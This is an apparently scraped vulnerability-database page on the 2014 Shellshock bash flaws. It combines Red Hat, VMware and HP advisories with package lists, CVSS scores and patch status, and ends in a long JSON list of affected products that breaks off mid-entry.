s390x: bash-3.2-32.el5_9.3.s390x.rpm bash-debuginfo-3.2-32.el5_9.3.s390x.rpm
x86_64: bash-3.2-32.el5_9.3.x86_64.rpm bash-debuginfo-3.2-32.el5_9.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node EUS (v. 6.4):
Source: bash-4.1.2-15.el6_4.2.src.rpm
x86_64: bash-4.1.2-15.el6_4.2.x86_64.rpm bash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm
Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.4):
Source: bash-4.1.2-15.el6_4.2.src.rpm
x86_64: bash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm bash-doc-4.1.2-15.el6_4.2.x86_64.rpm
Red Hat Enterprise Linux AUS (v. 6.2 server):
Source: bash-4.1.2-9.el6_2.2.src.rpm
x86_64: bash-4.1.2-9.el6_2.2.x86_64.rpm bash-debuginfo-4.1.2-9.el6_2.2.x86_64.rpm
Red Hat Enterprise Linux Server EUS (v. 6.4):
Source: bash-4.1.2-15.el6_4.2.src.rpm
i386: bash-4.1.2-15.el6_4.2.i686.rpm bash-debuginfo-4.1.2-15.el6_4.2.i686.rpm
ppc64: bash-4.1.2-15.el6_4.2.ppc64.rpm bash-debuginfo-4.1.2-15.el6_4.2.ppc64.rpm
s390x: bash-4.1.2-15.el6_4.2.s390x.rpm bash-debuginfo-4.1.2-15.el6_4.2.s390x.rpm
x86_64: bash-4.1.2-15.el6_4.2.x86_64.rpm bash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 6.2):
Source: bash-4.1.2-9.el6_2.2.src.rpm
x86_64: bash-debuginfo-4.1.2-9.el6_2.2.x86_64.rpm bash-doc-4.1.2-9.el6_2.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional EUS (v. 6.4):
Source: bash-4.1.2-15.el6_4.2.src.rpm
i386: bash-debuginfo-4.1.2-15.el6_4.2.i686.rpm bash-doc-4.1.2-15.el6_4.2.i686.rpm
ppc64: bash-debuginfo-4.1.2-15.el6_4.2.ppc64.rpm bash-doc-4.1.2-15.el6_4.2.ppc64.rpm
s390x: bash-debuginfo-4.1.2-15.el6_4.2.s390x.rpm bash-doc-4.1.2-15.el6_4.2.s390x.rpm
x86_64: bash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm bash-doc-4.1.2-15.el6_4.2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2014-7169.html https://www.redhat.com/security/data/cve/CVE-2014-7186.html https://www.redhat.com/security/data/cve/CVE-2014-7187.html https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/articles/1200223
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFUJau9XlSAg2UNWIIRAhKkAKC931kAxA4S4exwT4uGhDr7uDFIKQCglKKS N0AJiOto/RXwBqHtbfr1wkM= =SeAK -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Summary
VMware product updates address Bash security vulnerabilities. Relevant Releases (Affected products for which remediation is present)
vCenter Log Insight 2.0
- Problem Description
a. Bash update for multiple products.
Bash libraries have been updated in multiple products to resolve
multiple critical security issues, also referred to as Shellshock.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the identifiers CVE-2014-6271, CVE-2014-7169,
CVE-2014-7186, and CVE-2014-7187 to these issues.
VMware products have been grouped into the following four
product categories:
I) ESXi and ESX Hypervisor
ESXi is not affected because ESXi uses the Ash shell (through
busybox), which is not affected by the vulnerability reported
for the Bash shell. See table 1 for
remediation for ESX.
II) Windows-based products
Windows-based products, including all versions of vCenter Server
running on Windows, are not affected.
III) VMware (virtual) appliances
VMware (virtual) appliances ship with an affected version of Bash.
See table 2 for remediation for appliances.
IV) Products that run on Linux, Android, OSX or iOS (excluding
virtual appliances)
Products that run on Linux, Android, OSX or iOS (excluding
virtual appliances) might use the Bash shell that is part of the
operating system. VMware recommends that customers
contact their operating system vendor for a patch.
MITIGATIONS
VMware encourages restricting access to appliances through
firewall rules and other network layer controls to only trusted IP
addresses. This measure will greatly reduce any risk to these
appliances.
RECOMMENDATIONS
VMware recommends customers evaluate and deploy patches for
affected products in Table 1 and 2 below as these
patches become available.
Column 4 of the following tables lists the action required to
remediate the vulnerability in each release, if a solution is
available.
Table 1 - ESXi and ESX Hypervisor
=================================
VMware Product Running Replace with/
Product Version on Apply Patch
============== ======= ======= =============
ESXi any ESXi Not affected
ESX 4.1 ESX Patch pending *
ESX 4.0 ESX Patch pending *
* VMware will make VMware ESX 4.0 and 4.1 security patches available
for the Bash shell vulnerability. This security patch release is an
exception to the existing VMware lifecycle policy.
Table 2 - Products that are shipped as a (virtual) appliance.
=============================================================
VMware Product Running Replace with/
Product Version on Apply Patch
============== ======= ======= =============
vCenter Server Appliance 5.x Linux Patch Pending
Horizon DaaS Platform 6.x Linux Patch Pending
Horizon Workspace 1.x, 2.x Linux Patch Pending
IT Business Management Suite 1.x Linux Patch Pending
NSX for Multi-Hypervisor 4.x Linux Patch Pending
NSX for vSphere 6.x Linux Patch Pending
NVP 3.x Linux Patch Pending
vCenter Converter Standalone 5.x Linux Patch Pending
vCenter Hyperic Server 5.x Linux Patch Pending
vCenter Infrastructure Navigator 5.x Linux Patch Pending
vCenter Log Insight 1.x, 2.x Linux 2.0 U1
vCenter Operations Manager 5.x Linux Patch Pending
vCenter Orchestrator Appliance 4.x, 5.x Linux Patch Pending
vCenter Site Recovery Manager 5.x Linux Patch Pending
** vCenter Support Assistant 5.x Linux Patch Pending vCloud Automation Center 6.x Linux Patch Pending vCloud Automation Center Application Services 6.x Linux Patch Pending vCloud Director Appliance 5.x Linux Patch Pending vCloud Connector 2.x Linux Patch Pending vCloud Networking and Security 5.x Linux Patch Pending vCloud Usage Meter 3.x Linux Patch Pending vFabric Application Director 5.x, 6.x Linux Patch Pending vFabric Postgres 9.x Linux Patch Pending Viewplanner 3.x Linux Patch Pending VMware Application Dependency Planner x.x Linux Patch Pending VMware Data Recovery 2.x Linux Patch Pending VMware HealthAnalyzer 5.x Linux Patch Pending VMware Mirage Gateway 5.x Linux Patch Pending VMware Socialcast On Premise x.x Linux Patch Pending VMware Studio 2.x Linux Patch Pending VMware TAM Data Manager x.x Linux Patch Pending VMware Workbench 3.x Linux Patch Pending vSphere App HA 1.x Linux Patch Pending vSphere Big Data Extensions 1.x, 2.x Linux Patch Pending vSphere Data Protection 5.x Linux Patch Pending vSphere Management Assistant 5.x Linux Patch Pending vSphere Replication 5.x Linux Patch Pending vSphere Storage Appliance 5.x Linux Patch Pending
** This product includes Virtual Appliances that will be updated, the
product itself is not a Virtual Appliance. Solution
vCenter Log Insight
Downloads: https://www.vmware.com/go/download-vcenter-log-insight (click Go to Downloads) Documentation: http://kb.vmware.com/kb/2091065
- References
VMware Knowledge Base Article 2090740 http://kb.vmware.com/kb/2090740
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 , http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187
- Change Log
2014-09-30 VMSA-2014-0010 Initial security advisory in conjunction with the release of vCenter Log Insight 2.0 U1 on 2014-09-30. Contact
E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
security-announce at lists.vmware.com
bugtraq at securityfocus.com
fulldisclosure at seclists.org
E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories http://www.vmware.com/security/advisories
VMware Security Response Policy https://www.vmware.com/support/policies/security_response.html
VMware Lifecycle Policy https://www.vmware.com/support/policies/lifecycle.html
Twitter https://twitter.com/VMwareSRC
Copyright 2014 VMware Inc. All rights reserved.
Release Date: 2014-10-16 Last Updated: 2014-10-16
Potential Security Impact: Remote unauthorized access
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY A potential security vulnerability has been identified with certain HP StoreOnce Backup systems running Bash Shell. However, HP is unaware of any method that would allow this vulnerability to be exploited on HP StoreOnce Backup systems but is providing an updated version of Bash Shell as a precaution.
References:
CVE-2014-7169 CVE-2014-6271 CVE-2014-7187 CVE-2014-7186 SSRT101749
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP StoreOnce Backup software versions 3.0.0 to 3.11.3.
Please refer to the RESOLUTION section below for a list of impacted products.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION HP has made the following updates available to resolve the vulnerability in HP StoreOnce Backup systems running Bash Shell.
HP StoreOnce Backup version 3.11.4 for the following products:
Product SKU Product Name
BB896A HP StoreOnce 6500 Backup
EJ022A HP StoreOnce B6200 Backup
BB903A HP StoreOnce 4900 Backup
BB877A HP StoreOnce 2700 Backup
BB878A HP StoreOnce 4500 Backup
BB879A HP StoreOnce 4700 Backup
HP StoreOnce 2610 iSCSI Backup system
BB852A HP StoreOnce 2620 iSCSI Backup system
BB853A HP StoreOnce 4210 iSCSI Backup system
BB854A HP StoreOnce 4210 FC Backup system
BB855A HP StoreOnce 4220 Backup system
BB856A HP StoreOnce 4420 Backup system
BB857A HP StoreOnce 4430 Backup system
TC458A/AAE HP StoreOnce VSA 10 TB 3 Year Software
D4T77A/AAE HP StoreOnce VSA 4 TB 3 Year Software
HISTORY Version:1 (rev.1) - 16 October 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. Relevant releases/architectures:
SJIS (v.
Shift_JIS, also known as "SJIS", is a character encoding for the Japanese language. This package provides bash support for the Shift_JIS encoding. Note that certain services, screen sessions, and tmux sessions may need to be restarted, and affected interactive users may need to re-login. Installing these updated packages without restarting services will address the vulnerability, but functionality may be impacted until affected services are restarted
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201409-1148", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "1.14.7" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "2.01" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "2.0" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "1.14.4" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "1.14.1" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "1.14.0" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "1.14.6" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "1.14.2" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "1.14.3" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "1.14.5" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "4.2" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "3.2.48" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "4.0" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "3.2" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "4.1" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "4.3" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.01.1" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.02" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "3.0.16" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.02.1" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "3.0" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "3.1" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.05" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.03" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.04" }, { "model": "manageone v100r002c10", "scope": null, "trust": 0.9, "vendor": "huawei", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "apple", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "avaya", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "barracuda", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "blue coat", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "centos", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "check point", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "cygwin", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "d link", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "debian gnu linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "dell computer", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "extreme", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "f5", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "fedora", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "fireeye", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "gnu bash", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "gentoo linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "juniper", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "mageia", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "mcafee", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "monroe", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "niksun", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "netapp", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "novell", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "palo alto", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "qnap security", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "red hat", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "suse linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "slackware linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "sophos", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "trend micro", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ubuntu", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "vmware", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "xirrus", "version": null }, { "model": "bash", "scope": "lte", "trust": 0.8, "vendor": "gnu", "version": "4.3 bash43-026" }, { "model": "qts", "scope": "lte", "trust": 0.8, "vendor": "qnap", "version": "4.1.1 build 0927 and earlier" }, { "model": "qts", "scope": "eq", "trust": 0.8, "vendor": "qnap", "version": null }, { "model": "manageone v100r002c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "unified contact center express", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "manageone v100r002c20", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "unity connection", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "smartcloud provisioning fixpack for sv", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1689.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.924.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.1" }, { "model": "oceanstor s5300 v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375127" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.31" }, { "model": "ucs invicta appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secureplatform r75.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.51" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.166" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.891.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.15" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.306.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1012" }, { "model": "manageone v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "e9000 blade server ch220 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1005.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.42" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1039" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "gaia embedded r75.47", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura communication manager sp5", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.434.0" }, { "model": "telepresence manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.702.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1311.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.687.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.365.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.879.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.74" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.317.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.92" }, { "model": "protectier appliance edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.926.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.47255" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.39" }, { "model": "oceanstor s5500t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.530.0" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": null, "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2053-4240" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.58" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.122" }, { "model": "key vault", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.59" }, { "model": "database appliance", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.57" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "cloudsystem enterprise software", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "8.1.2" }, { "model": "junos space ja1500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "horizon workspace", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.8" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "move antivirus agentless", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.2" }, { "model": "oceanstor dorado g2 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "2100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1308.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.633.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "download server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", 